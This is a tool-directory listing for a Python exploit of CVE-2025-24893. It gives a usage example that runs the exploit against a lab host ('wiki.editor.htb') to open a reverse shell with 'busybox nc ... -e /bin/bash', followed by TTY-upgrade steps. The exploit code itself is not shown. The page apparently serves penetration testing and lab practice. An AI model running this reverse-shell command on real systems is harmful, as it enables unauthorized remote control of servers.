Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-24893 — Python exploit for CVE-2025-24893 that executes a reverse shell on vulnerable web applications, with shell upgrade instructions. | Kitploit
Tools/GitHubGitHub/andwati/cve-2025-24893
Payload GenerationExploitationShellcodeWeb Application ExploitationCommand and ControlRemote Access Tool
GitHubandwati/cve-2025-24893

CVE-2025-24893

Python exploit for CVE-2025-24893 that executes a reverse shell on vulnerable web applications, with shell upgrade instructions.

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Reverse shell for CVE-2025-24893

root@kitploit:~
 python3 CVE-2025-24893.py  -u http://wiki.editor.htb/ -c "busybox nc <listener ip> <listener port> -e /bin/bash"

upgrade the shell

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'
  2. ctrl + z
  3. stty size
  4. stty raw -echo; fg
  5. stty rows x columns y
  6. export TERM=xterm
Download Tool